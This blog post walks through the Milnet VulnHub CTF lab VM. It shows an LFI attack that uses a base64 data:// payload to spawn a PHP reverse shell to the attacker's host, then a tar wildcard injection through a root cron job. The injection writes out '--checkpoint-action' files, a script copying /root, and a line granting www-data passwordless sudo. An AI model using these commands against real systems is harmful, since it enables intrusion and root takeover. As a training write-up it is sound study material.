Milnet – VulnHub CTF Challenge Write Up

///Milnet – VulnHub CTF Challenge Write Up

Milnet – VulnHub CTF Challenge Write Up

This CTF write up written during Milnet CTF Challenge. Solving CTF challenge helps in sharpening your penetration testing skills. Vulnhub provides series of VMs with inbuilt vulnerabilities.

Milnet CTF Challenge was created by Warrior. You can download the VM on this link. The VM will be in .ova format, which can be imported to VMware or Virtual Box. Starting phase of any CTF will discovering the IP of the VM that we gonna pwn. Putting the VM Machine in bridged mode may make it difficult to find the IP that its running on. As for my convinience I made it to NAT in my VMWare so that it get an IP in range of 192.168.200.1/24 which was my NAT Range.

The initial step was to find out the machine’s IP address. For that it was easy to use arp-scan tool

arp-scan 192.168.200.1/24

This will show all VMs running on VMware NAT network. I figured out the IP address of the target VM to be 192.168.200.151.

Next step was to do an intense scan using nmap

 
Nmap scan report for 192.168.200.151
Host is up (0.000082s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.35
MAC Address: 0c:03:27:3B:0E:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/

 

The nmap scan indicated there are two services running, an open ssh and a webserver. Doing some url fuzzing using dirbuster found some php files. I visted the website and looks like below.

 

I ran nikto against the VM and results are shown below

- 
Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.200.151
+ Target Hostname:    192.168.200.151
+ Target Port:        80
+ Start Time:         2017-01-21 03:18:43 (GMT530)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7899 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2017-01-21 03:18:58 (GMT530) (15 seconds)
---------------------------------------------------------------------------

Found an info.php file which gives information about the php server. Opening it conclude following things


allow_url_fopen		On
allow_url_include	On
$_SERVER['DOCUMENT_ROOT']	/var/www/html
$_SERVER['SCRIPT_FILENAME']	/var/www/html/info.php

also the content.php was showing an RFI vulnerability, so that I can include a remote file and execute it. Digging deeper index page sends a post request to content.php with route parameter route=main. Which means that is an LFI vulnerability. The route parameter was the culprit. So I tested it with a simple demo

route=../../../var/www/html/info

And It works like a charm. POST a data towards the server so that it gets executed. Reading lot of LFI techniques and found that we can send any PHP code by encoding it using base 64. The format was just as below.

route=data://text/plain;base64,AaBbCcDc==

where AaBbCcDc== is the base64 encoding of out PHP code. I used the php reverse shell script from pentest monkey [Pentest Monkey PHP Rev Shell].
Encoded the reverse shell to base64 format using https://www.base64encode.org. Repeated the Burp request with encoded data and spawned a reverse shell @ 192.168.200.100:443
Now fetching /etc/passwd which provided me with the following


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash

Went inside langman folder but nothing useful.
Next step of the CTF will be privillege escalation. This can be either done through exploiting a service or an executable that has super user permission or checking any root privilleged files are writable by www-data which has a run as root privillege. Another idea is to check for cron jobs. In my short research I found following entry in crontab


# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
*/1 * * * * root /backup/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

This means the creator put /backup/backup.sh to run at every minuite. Contents were


#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

But during the intial process of file search I came accross a file named ‘DefenseCode_Unix_WildCards_Gone_Wild.txt’ inside ‘/home/langman/SDINET’which depicts the same http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt. It shows how to run commands using tar function.
On a detailed study, I created a temp exploit file exploit_code.sh


www-data@seckenheim:/tmp$ echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit_code.sh
echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit_code.sh
www-data@seckenheim:/tmp$ cat /var/www/html/exploit_code.sh
cat /var/www/html/exploit_code.sh
cp -R /root/* /tmp/root; chmod -R 777 /tmp/root
www-data@seckenheim:/tmp$ mkdir /tmp/root
mkdir /tmp/root

Now created two files in /var/www/html using following commands

 
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=sh\ exploit_code.sh

Now the /var/www/html show the following contents


-rw-r--r-- 1 www-data www-data 0 Jan 23 23:19 --checkpoint-action=exec=sh exploit_code.sh
-rw-r--r-- 1 www-data www-data 0 Jan 23 23:19 --checkpoint=1
-rw-r--r-- 1 root root 73450 Aug 6 2015 bomb.jpg
-rw-r--r-- 1 root root 3901 May 21 18:56 bomb.php
-rw-r--r-- 1 root root 124 May 21 17:50 content.php
-rw-r--r-- 1 www-data www-data 48 May 23 23:18 exploit_code.sh
-rw-r--r-- 1 root root 145 May 21 17:17 index.php
-rw-r--r-- 1 www-data www-data 20 May 21 15:54 info.php
-rw-r--r-- 1 root root 109 May 21 18:53 main.php
-rw-r--r-- 1 root root 18260 Jan 22 2012 mj.jpg
-rw-r--r-- 1 root root 532 May 21 23:33 nav.php
-rw-r--r-- 1 root root 221 May 21 23:33 props.php
-rwxr-xr-x 1 www-data www-data 8 Jan 23 23:15 shell.sh

The shell.sh will be having our exploit code that should be run inorder to root the machine. I pasted following code into shell.sh so that www-data will get root privillege.


echo "www-data ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Now I put patience on so that the cron job gets executed. After a small break, did a cd into root and ls shows the following


www-data@seckenheim:/tmp$ cd root
cd root
www-data@seckenheim:/tmp/root$ ls -l
ls -l
total 4
-rwxrwxrwx 1 root root 1727 Jan 23 23:20 credits.txt
www-data@seckenheim:/tmp/root$ cat credits.txt
cat credits.txt
 ,----,                                                               
      ,/   .`|                                                               
    ,`   .'  :  ,---,                          ,---,.                        
  ;    ;     /,--.' |                        ,'  .' |                  ,---, 
.'___,/    ,' |  |  :                      ,---.'   |      ,---,     ,---.'| 
|    :     |  :  :  :                      |   |   .'  ,-+-. /  |    |   | : 
;    |.';  ;  :  |  |,--.   ,---.          :   :  |-, ,--.'|'   |    |   | | 
`----'  |  |  |  :  '   |  /     \         :   |  ;/||   |  ,"' |  ,--.__| | 
    '   :  ;  |  |   /' : /    /  |        |   :   .'|   | /  | | /   ,'   | 
    |   |  '  '  :  | | |.    ' / |        |   |  |-,|   | |  | |.   '  /  | 
    '   :  |  |  |  ' | :'   ;   /|        '   :  ;/||   | |  |/ '   ; |:  | 
    ;   |.'   |  :  :_:,''   |  / |        |   |    \|   | |--'  |   | '/  ' 
    '---'     |  | ,'    |   :    |        |   :   .'|   |/      |   :    :| 
              `--''       \   \  /         |   | ,'  '---'        \   \  /   
                           `----'          `----'                  `----'    
This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo's Egg.
If you have not read it give it a try:

 

Thats great!!!. Machine rooted….Milnet VM CTF Challenge was completed!!!

By | 2019-01-16T18:51:03+05:30 April 2nd, 2017|VulnHub|1 Comment

About the Author:

One Comment

  1. online storage April 7, 2020 at 12:02 pm - Reply

    I have been browsing online more than 4 hours today, yet I never found any interesting article
    like yours. It is pretty worth enough for me. In my view, if
    all website owners and bloggers made good content as you
    did, the internet will be a lot more useful than ever before.

Leave A Comment